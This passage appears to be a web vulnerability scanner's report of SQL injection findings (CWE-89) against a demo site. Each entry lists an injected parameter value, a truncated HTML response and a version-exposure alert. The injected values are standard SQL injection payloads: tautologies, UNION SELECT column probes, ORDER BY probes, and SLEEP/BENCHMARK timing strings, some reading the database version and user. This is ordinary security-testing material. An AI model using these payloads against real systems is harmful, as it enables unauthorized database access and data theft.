href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1802\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ' or '1'='1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1803\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ' or benchmark(10000000,MD5(1))\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1804\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1805\nScan SQL InjectionSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1806\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1807\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# + SLEEP(10) + '\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1808\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1809\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A'))\n,4\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#CWE-ID CWE-89\nIssue Number #1810\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1811\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1812\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# OR 1=1--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1813\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1814\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1815\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 19#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token 